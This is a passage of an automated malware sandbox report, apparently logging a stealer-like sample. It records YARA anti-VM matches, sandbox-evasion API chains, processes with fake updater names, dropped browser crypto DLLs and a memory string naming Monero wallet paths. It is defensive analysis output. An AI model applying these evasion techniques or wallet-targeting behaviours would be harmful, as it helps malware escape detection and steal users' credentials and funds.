                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Yara detected AntiVM3
                            Source: Yara matchFile source: 35.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.E4aR4O9hOTF5WJfvKNpcVCp8.exe.38e5570.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.E4aR4O9hOTF5WJfvKNpcVCp8.exe.38e5570.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 35.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000023.00000002.2984201099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.2354142791.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: E4aR4O9hOTF5WJfvKNpcVCp8.exe PID: 6812, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6208, type: MEMORYSTR
                            Found API chain indicative of sandbox detection
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSandbox detection routine: GetCursorPos, DecisionNode, Sleepgraph_6-59561
                            Found evasive API chain (may stop execution after checking locale)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
                            Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_6-59563
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                            Source: RegAsm.exe, 00000023.00000002.2984201099.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 1280000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 2E10000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 4E10000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 55E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 65E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 6710000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 7710000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 7BA0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 8BA0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 9BA0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: ACE0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: BCE0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: C170000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: D170000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: E5A0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: F5A0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 105A0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 115A0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 125A0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 135A0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 17B0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 5180000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 59D0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 69D0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 6B00000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 7B00000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 7E50000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 8E50000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 59D0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 6B00000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 8280000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: A050000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: B050000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 9280000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 59D0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: EC0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 2B60000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 28B0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 5160000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 6160000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 6290000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 7290000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 75E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 85E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 5160000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 75E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 85E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 96E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: A6E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 6870000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: B6E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: C6E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeMemory allocated: 1320000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeMemory allocated: 2B50000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeMemory allocated: 2A90000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 13F0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 2EB0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 4EB0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 55D0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 65D0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 6700000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 7700000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 7B50000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 8B50000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 9B50000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: AB50000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: BC50000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: C0E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: D0E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 55D0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 6700000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 7B50000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 8B50000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 9B50000 memory reserve | memory write watch
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeMemory allocated: 1390000 memory reserve | memory write watch
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeMemory allocated: 3110000 memory reserve | memory write watch
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeMemory allocated: 1710000 memory reserve | memory write watch
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeMemory allocated: E40000 memory reserve | memory write watch
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeMemory allocated: 28E0000 memory reserve | memory write watch
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeMemory allocated: 48E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 2DA0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 2E10000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 4E10000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 5600000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 6600000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 6730000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 7730000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 7BC0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 8BC0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 9BC0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: AD00000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: BD00000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: C190000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: D190000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 5600000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 6730000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 7BC0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 8BC0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 9BC0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 2B20000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 2CD0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 4CD0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 54B0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 64B0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 65E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 75E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 7930000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 8930000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 54B0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 65E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 7D30000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 9B30000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: AB30000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 8D40000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeMemory allocated: 54B0000 memory reserve | memory write watch
                            Source: C:\Users\userCGHCGIIDGD.exeMemory allocated: B10000 memory reserve | memory write watch
                            Source: C:\Users\userCGHCGIIDGD.exeMemory allocated: 2870000 memory reserve | memory write watch
                            Source: C:\Users\userCGHCGIIDGD.exeMemory allocated: B40000 memory reserve | memory write watch
                            Source: C:\Users\userJEHDHIEGII.exeMemory allocated: 1020000 memory reserve | memory write watch
                            Source: C:\Users\userJEHDHIEGII.exeMemory allocated: 2D20000 memory reserve | memory write watch
                            Source: C:\Users\userJEHDHIEGII.exeMemory allocated: 2960000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 8F0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 27A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: BA0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 4E40000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 4CF0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 5E40000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 6E40000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 7290000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 8290000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 4E40000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 8290000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 9290000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 7290000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: A290000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 63F0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 4E40000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMemory allocated: 8290000 memory reserve | memory write watch
                            Source: C:\ProgramData\FIEHIIIJDA.exeMemory allocated: 1090000 memory reserve | memory write watch
                            Source: C:\ProgramData\FIEHIIIJDA.exeMemory allocated: 2C40000 memory reserve | memory write watch
                            Source: C:\ProgramData\FIEHIIIJDA.exeMemory allocated: 29B0000 memory reserve | memory write watch
                            Source: C:\ProgramData\JJJEGCGDGH.exeMemory allocated: FF0000 memory reserve | memory write watch
                            Source: C:\ProgramData\JJJEGCGDGH.exeMemory allocated: 2970000 memory reserve | memory write watch
                            Source: C:\ProgramData\JJJEGCGDGH.exeMemory allocated: 4970000 memory reserve | memory write watch
                            Source: C:\ProgramData\EBAEBFIIEC.exeMemory allocated: CE0000 memory reserve | memory write watch
                            Source: C:\ProgramData\EBAEBFIIEC.exeMemory allocated: 2770000 memory reserve | memory write watch
                            Source: C:\ProgramData\EBAEBFIIEC.exeMemory allocated: 24F0000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCursorPos,GetCursorPos,Sleep,GetCursorPos,__aulldiv,Sleep,6_2_00432300
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\userCGHCGIIDGD.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\userJEHDHIEGII.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeThread delayed: delay time: 922337203685477
                            Source: C:\ProgramData\FIEHIIIJDA.exeThread delayed: delay time: 922337203685477
                            Source: C:\ProgramData\JJJEGCGDGH.exeThread delayed: delay time: 922337203685477
                            Source: C:\ProgramData\EBAEBFIIEC.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeWindow / User API: threadDelayed 5673Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeWindow / User API: threadDelayed 4134Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeWindow / User API: threadDelayed 3907Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeWindow / User API: threadDelayed 5735Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeWindow / User API: threadDelayed 472Jump to behavior
                            Source: C:\Users\userJEHDHIEGII.exeWindow / User API: threadDelayed 402
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeWindow / User API: threadDelayed 5696
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeWindow / User API: threadDelayed 3875
                            Source: C:\ProgramData\EBAEBFIIEC.exeWindow / User API: threadDelayed 355
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 5.0 %
                            Source: C:\Users\user\Desktop\file.exe TID: 2496Thread sleep count: 204 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2496Thread sleep count: 288 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 5160Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe TID: 5144Thread sleep count: 5673 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe TID: 5144Thread sleep count: 4134 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe TID: 2996Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe TID: 5352Thread sleep count: 67 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe TID: 5352Thread sleep time: -67000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe TID: 3300Thread sleep count: 52 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe TID: 3300Thread sleep time: -52000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe TID: 2244Thread sleep time: -25825441703193356s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe TID: 5388Thread sleep count: 3907 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe TID: 5388Thread sleep count: 5735 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exe TID: 5960Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1916Thread sleep count: 41 > 30Jump to behavior
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exe TID: 5828Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exe TID: 5772Thread sleep count: 241 > 30
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exe TID: 5564Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\userCGHCGIIDGD.exe TID: 1584Thread sleep count: 326 > 30
                            Source: C:\Users\userCGHCGIIDGD.exe TID: 1584Thread sleep count: 79 > 30
                            Source: C:\Users\userCGHCGIIDGD.exe TID: 3004Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\userJEHDHIEGII.exe TID: 5908Thread sleep count: 402 > 30
                            Source: C:\Users\userJEHDHIEGII.exe TID: 2528Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3080Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe TID: 2616Thread sleep time: -13835058055282155s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe TID: 6444Thread sleep count: 5696 > 30
